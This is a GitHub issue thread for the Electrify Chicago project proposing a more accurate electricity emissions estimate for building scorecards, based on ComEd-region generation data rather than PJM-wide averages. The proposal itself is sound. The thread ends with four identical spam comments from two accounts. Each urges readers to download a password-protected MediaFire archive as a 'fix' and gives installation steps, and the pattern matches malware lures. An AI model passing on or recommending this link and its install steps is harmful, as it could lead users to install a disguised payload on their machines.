### ISSUE TITLE
New electricity emissions estimate feature

### ISSUE THREAD

**Issue by MisterClean** [vkoves/electrify-chicago#121]
As a user I would like a more accurate representation of electricity emissions on building scorecards. 

**Problem**
Electricity emissions reported by the city rely on an [environmental report from ComEd](https://azure-na-assets.contentstack.com/v3/assets/blt3ebb3fed6084be2a/bltea282e675fc6541b/65144bcc2901d5000d942b2a/Environmental_Disclosure_12_months_ending_06302023.pdf) which misrepresents the generation mix of the grid that ComEd buys power from. 

This disclosure report uses the overall total generation mix of the PJM balancing authority, a grid spanning 14 states. 

Historically, before ComEd joined PJM in 2004, the region of northern Illinois was its own balancing authority with a control center in Oak Brook. As its own balancing authority, ComEd imported very little power from other regions. It planned sufficient capacity (largely from nuclear) to run independently from the surrounding regions. 

The physical grid that ComEd built as a regulated vertical utility is the one that post-2004 ComEd, the franchise transmission and distribution company, exists on today. 

As such, we generate and consume a TON of low-carbon nuclear power, importing very little electricity from neighboring regions. 

**PJM Illinois Reporting**
Each year, PJM releases an [infrastructure report](https://www.pjm.com/-/media/library/reports-notices/state-specific-reports/2023/illinois.ashx) that summarizes the generation mix and CO2 emissions within their region of Illinois. In 2023, the mix was 73.7% nuclear. Tack on wind and solar and it gets you up to around 80.4% clean generation. The CO2 emissions were around 305lbs / mwh (137g / kWh). 

**Here’s the wild part.** On the consumption side of the grid, the ComEd region averages 10.6 gigawatts of load annually ([grid status](https://www.gridstatus.io/graph/zonal-load?iso=pjm&date=2024-08-31)), which is _lower_ than the average generation. We export every minute of the year to the wider PJM and MISO grids. 

That is the underpinning behind this statement from ComEd in a [2022 blog post](https://poweringlives.comed.com/2022-a-year-of-record-setting-reliability-equity-and-driving-clean-energy/)

> ComEd's service territory is a national leader in clean energy: In 2022, enough clean energy was available to meet 96 percent of our customers' consumption on an hour-by-hour basis.

**TLDR**
The building scorecards in Electrify Chicago are misleading because the emissions factor for buildings is actually significantly cleaner than the PJM-wide average. 

**Proposal**
Build a new "Electrify Chicago Estimate" that augments the reporting from the city. 

Calculate the emissions factor using EIA generator pollution reporting, and combine that with the reported electricity consumption from the city that lands in the database as kBtu.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
